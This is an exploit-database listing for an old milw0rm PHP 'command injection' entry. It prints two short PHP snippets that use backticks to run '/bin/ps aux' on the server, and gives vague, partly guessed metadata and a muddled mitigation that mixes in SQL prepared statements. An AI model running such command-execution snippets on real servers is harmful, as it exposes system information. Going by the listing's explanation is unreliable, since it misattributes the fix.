header-logo
Suggest Exploit
vendor:
PHP
by:
Unknown
7.5
CVSS
HIGH
Command Injection
78
CWE
Product Name: PHP
Affected Version From: All versions prior to the patch
Affected Version To: Unknown
Patch Exists: YES (Assuming a patch or fix was released)
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2004

Command Injection in PHP

This exploit allows an attacker to execute arbitrary commands on the server by injecting them into the PHP code. In this case, the attacker is executing the command '/bin/ps aux' using the backtick operator (`) and piping the output to the 'nl2br' function to format it as HTML.

Mitigation:

To mitigate this vulnerability, input validation and sanitization should be implemented to ensure that user-supplied data is not executed as commands. Additionally, using prepared statements or parameterized queries when interacting with databases can help prevent command injection attacks.
Source

Exploit-DB raw data:

<?php 
$blah = `& /bin/ps aux`; 
echo nl2br($blah); 
?> 

<?php 
$blah = `| /bin/ps aux`; 
echo nl2br($blah); 
?> 


# milw0rm.com [2004-08-08]

Navigation

Suggest Exploit

Services By CQR